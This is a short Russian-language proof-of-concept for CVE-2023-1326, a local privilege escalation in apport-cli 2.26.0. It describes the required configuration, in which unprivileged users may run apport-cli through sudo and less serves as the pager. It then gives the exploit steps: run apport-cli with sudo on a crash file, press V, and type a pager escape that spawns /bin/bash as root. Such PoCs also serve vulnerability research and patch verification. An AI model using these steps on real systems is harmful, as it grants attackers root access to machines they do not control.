
Доказательство концепции для CVE-2023–1326 в apport-cli 2.26.0
Доказательство концепции (PoC) для CVE-2023–1326 в apport-cli 2.26.0
Эта уязвимость представляет собой повышение привилегий в apport-cli 2.26.0, аналогично CVE-2023–26604. Она срабатывает только в случае, если apport-cli разрешено выполнять через sudo:

Атака повышения привилегий была обнаружена в apport-cli 2.26.0 и более ранних версиях, аналогичная CVE-2023-26604. Если система специально настроена так, чтобы непривилегированные пользователи могли выполнять sudo apport-cli, less настроен как пейджер, и размер терминала может быть установлен, то локальный злоумышленник может повысить свои привилегии.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
